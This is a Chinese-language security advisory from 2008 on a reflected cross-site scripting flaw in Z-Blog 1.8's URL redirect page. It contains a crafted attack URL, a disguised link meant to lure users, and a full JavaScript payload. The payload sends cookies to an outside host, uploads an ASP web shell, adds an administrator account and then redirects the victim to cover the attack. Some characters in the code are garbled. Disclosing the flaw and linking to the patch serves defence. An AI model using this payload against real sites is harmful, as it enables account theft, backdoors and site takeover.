Z-blog跨站脚本攻击漏洞


添加时间:
2008-10-04

系统编号:
WAVDB-01232

影响版本:
Z-Blog 1.8

程序介绍:

Z-Blog是一个单机版,支持多用户共同创作,基于用户权限管理的BLOG发布程序,采用XHTML v1.0 Transitional标准,符合Web Standards网页设计标准,支持多种语言(需更换语言包),支持界面样式的更换,可选择生成多种类型的静态化日志,客户端支持IE、Mozilla Firefox、Opera、Safari等通用浏览器。

漏洞分析:

在产品中被发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果.

在FUNCTION/c_urlredirect.asp中,程序对提交的url参数做如下处理

 
  1. strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))  

其中URLDecodeForAntiSpam是防止垃圾连接的解码函数,其函数处理如下

 
  1. Function URLDecodeForAntiSpam(strUrl)  
  2.   
  3. Dim i,s  
  4. For i =1 To Len(strUrl) Step 2  
  5. s=s & Mid(strUrl,i,1)  
  6. Next  
  7. URLDecodeForAntiSpam=s  
  8.   
  9. End Function  

在做如上处理之后程序将在c_urlredirect.asp输出url参数

 
  1. ...  
  2. <meta http-equiv="refresh" content="0;URL=“/>  
  3. …  

 



漏洞利用:

精心构造url参数将能构造一个url类型的非持久xss如下:

http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1×2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex

上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。

而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下:

[URL=http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1x2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex]http://www.80sec.com[/URL]


用户看到的是http://www.80sec.com这个信任的站点,而一旦点击将在www.foo.com域执行恶意用户指定的js,在该js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下:


xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http://www.80sec.com/';

//get cookie
x=new Image();
x.src="http://www.80sec.com/c.php?c="+escape(document.cookie);

//get a shell
data="txaContent=<%25execute(request(%22a%22))%25>“;
postmydata(”http://www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data);

//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”;
postmydata(”http://www.0×37.com/cmd.asp?act=UserCrt”,data);

//fool the user
window.location=tolocation;

function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(’text/xml’);
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}

function postmydata(action,data){
xmlhttp.open("POST", action, false);
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.send(data);
return xmlhttp.responseText;
}



解决方案:
厂商补丁:
Z-Blog
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.rainbowsoft.org/

信息来源:
<*来源:http://www.80sec.com/zbog-xss.html*>